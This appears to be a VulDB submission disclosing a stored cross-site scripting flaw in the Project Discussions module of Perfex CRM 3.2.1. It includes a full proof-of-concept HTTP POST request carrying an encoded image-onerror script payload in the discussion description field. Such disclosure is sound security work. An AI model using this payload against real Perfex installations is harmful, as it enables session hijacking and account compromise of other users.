Submit #546171: CodeCanyon Perfex CRM 3.2.1 Stored Cross-Site Scripting in Perfex CRM Project Discussioninfo

TitleCodeCanyon Perfex CRM 3.2.1 Stored Cross-Site Scripting in Perfex CRM Project Discussion
DescriptionA Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Project Discussions Module of Perfex CRM. This issue permits authenticated client users to inject malicious JavaScript payloads into the discussion description. Consequently, the injected code is executed whenever another user views the discussion. This vulnerability poses significant security risks, including session hijacking, phishing attacks, and the potential for complete account compromise. It is critical to address this vulnerability promptly to safeguard user data and ensure the integrity of the system. Request: POST /perfex/clients/project/2 HTTP/1.1 Host: 192.168.1.11 Content-Length: 173 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://192.168.1.11 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.11/perfex/clients/project/2?group=project_discussions Accept-Encoding: gzip, deflate, br Cookie: contact_language=english; csrf_cookie_name=80389ebf9f4a421a35838e8b8fa60994; sp_session=vcki9i2pek4meo4qhpc5m5r8urefusof Connection: keep-alive csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2&action=new_discussion&subject=Testing+Discussion&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B Affected Endpoint POST /perfex/clients/project/{project_id} HTTP/1.1
Source⚠️ https://github.com/bytium/vulnerability-research/blob/main/stored-xss-perfex-crm-3.2.1.md
User
 suffer (UID 74855)
Submission03/30/2025 11:40 (1 Year ago)
Moderation04/03/2025 15:40 (4 days later)
StatusAccepted
VulDB entry303180 [CodeCanyon Perfex CRM 3.2.1 Project Discussions 2 Description cross site scripting]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!